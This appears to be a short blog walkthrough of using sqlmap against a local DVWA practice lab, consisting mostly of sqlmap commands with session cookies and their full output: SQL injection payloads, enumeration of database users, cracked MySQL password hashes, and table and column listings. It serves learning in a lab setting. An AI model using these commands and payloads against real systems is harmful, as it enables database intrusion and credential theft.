1.active your apche and mysql in backtrack aplication
2.open your browser n type localhost/dvwa
change DWVA security
and input a variable. and look the tamper data.
3. and now open the sqlmap and input syntax
python ./sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=l4l6eh61c4vtc7mjqnj189ggo2; PHPSESSID=7bbjfskvr64lg12ik2t1guomf6" --string="Surname" --users --passwords
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:21:05
[11:21:05] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:21:05] [INFO] resuming injection data from session file
[11:21:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:21:05] [INFO] testing connection to the target url
[11:21:05] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 1886 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,122,122,58),(SELECT (CASE WHEN (1886=1886) THEN 1 ELSE 0 END)),CHAR(58,115,112,111,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cprL'='cprL&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,110,122,122,58),IFNULL(CAST(CHAR(98,119,97,110,113,73,98,73,78,69) AS CHAR),CHAR(32)),CHAR(58,115,112,111,58))# AND 'rzLh'='rzLh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'vxgo'='vxgo&Submit=Submit
---
[11:21:05] [INFO] manual usage of GET payloads requires url encoding
[11:21:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:21:05] [INFO] fetching database users
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'builder32'
[*] 'root'@'localhost'
[11:21:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[11:21:08] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[11:21:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[11:21:18] [INFO] starting dictionary attack (mysql_passwd)
[11:21:20] [INFO] found: 'root' for user: 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *8C4C424D182238AFBA8B217F692D07C952EF4087
[*] root [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
[11:22:34] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:22:34
python ./sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=l4l6eh61c4vtc7mjqnj189ggo2; PHPSESSID=7bbjfskvr64lg12ik2t1guomf6" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:47:21
[11:47:21] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:47:21] [INFO] resuming injection data from session file
[11:47:21] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:47:21] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 1886 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,122,122,58),(SELECT (CASE WHEN (1886=1886) THEN 1 ELSE 0 END)),CHAR(58,115,112,111,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cprL'='cprL&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,110,122,122,58),IFNULL(CAST(CHAR(98,119,97,110,113,73,98,73,78,69) AS CHAR),CHAR(32)),CHAR(58,115,112,111,58))# AND 'rzLh'='rzLh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'vxgo'='vxgo&Submit=Submit
---
[11:47:21] [INFO] manual usage of GET payloads requires url encoding
[11:47:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:47:21] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[11:47:21] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:47:21
python ./sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=l4l6eh61c4vtc7mjqnj189ggo2; PHPSESSID=7bbjfskvr64lg12ik2t1guomf6" -D dvwa --columns
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:50:11
[11:50:11] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:50:11] [INFO] resuming injection data from session file
[11:50:11] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:50:11] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 1886 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,122,122,58),(SELECT (CASE WHEN (1886=1886) THEN 1 ELSE 0 END)),CHAR(58,115,112,111,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cprL'='cprL&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,110,122,122,58),IFNULL(CAST(CHAR(98,119,97,110,113,73,98,73,78,69) AS CHAR),CHAR(32)),CHAR(58,115,112,111,58))# AND 'rzLh'='rzLh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'vxgo'='vxgo&Submit=Submit
---
[11:50:11] [INFO] manual usage of GET payloads requires url encoding
[11:50:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:50:11] [INFO] fetching tables for database: dvwa
[11:50:11] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users
[11:50:11] [INFO] fetching columns for table 'guestbook' on database 'dvwa'
[11:50:11] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+
Database: dvwa
Table: guestbook
[3 columns]
+------------+----------------------+
| Column | Type |
+------------+----------------------+
| comment | varchar(300) |
| comment_id | smallint(5) unsigned |
| name | varchar(100) |
+------------+----------------------+
[11:50:11] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:50:11
try more harder!
BalasHapusand keep post what ever your result!